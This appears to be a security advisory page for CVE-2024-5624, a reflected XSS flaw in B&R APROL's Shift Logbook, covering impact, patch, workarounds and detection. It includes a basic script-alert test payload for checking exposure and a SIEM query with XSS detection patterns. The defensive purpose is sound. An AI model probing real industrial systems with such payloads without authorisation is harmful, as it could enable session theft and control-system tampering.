CVE-2024-5624
📋 TL;DR
This reflected cross-site scripting vulnerability in B&R APROL's Shift Logbook application allows attackers to inject malicious JavaScript that executes in users' browsers. Attackers could steal session cookies, redirect users, or perform actions on their behalf. Organizations using B&R APROL automation systems with the Shift Logbook feature are affected.
💻 Affected Systems
- B&R APROL
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attacker steals administrator session cookies, gains full control of APROL system, modifies industrial processes, and potentially causes physical damage or production disruption.
Likely Case
Attacker steals user session cookies to gain unauthorized access to the APROL system, potentially viewing sensitive industrial data or making unauthorized configuration changes.
If Mitigated
With proper input validation and output encoding, malicious scripts are neutralized before reaching user browsers, preventing exploitation.
🎯 Exploit Status
Reflected XSS typically requires social engineering to trick users into clicking malicious links, but exploitation itself is straightforward once the vulnerable endpoint is identified.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Versions after R 4.4-00P3
Vendor Advisory: https://www.br-automation.com/fileadmin/SA24P2014_Multiple_vulnerabilities_in_BR_APROL.pdf-367290ae.pdf
Restart Required: Yes
Instructions:
1. Download and install the latest APROL version from B&R Automation. 2. Apply all security patches. 3. Restart the APROL system. 4. Verify the Shift Logbook application is updated.
🔧 Temporary Workarounds
Web Application Firewall (WAF)
allDeploy a WAF with XSS protection rules to filter malicious input before it reaches the application.
Input Validation Filter
allImplement server-side input validation to sanitize user input in the Shift Logbook application.
🧯 If You Can't Patch
- Implement strict Content Security Policy (CSP) headers to prevent execution of inline JavaScript
- Restrict network access to APROL systems using firewalls and network segmentation
🔍 How to Verify
Check if Vulnerable:
Test Shift Logbook endpoints by injecting basic XSS payloads like <script>alert('test')</script> and checking if they execute in the browser.Check Version:
Check APROL system version through the administration interface or consult system documentation for version query commands.Verify Fix Applied:
After patching, retest with XSS payloads to confirm they are properly sanitized and no longer execute.📡 Detection & Monitoring
Log Indicators:
- Unusual HTTP requests containing script tags or JavaScript code to Shift Logbook endpoints
- Multiple failed login attempts followed by suspicious requests
Network Indicators:
- HTTP requests with encoded script payloads in query parameters
- Traffic patterns showing users being redirected to malicious sites
SIEM Query:
source="aprol_logs" AND (uri="*shiftlogbook*" AND (query="*<script>*" OR query="*javascript:*" OR query="*onerror=*"))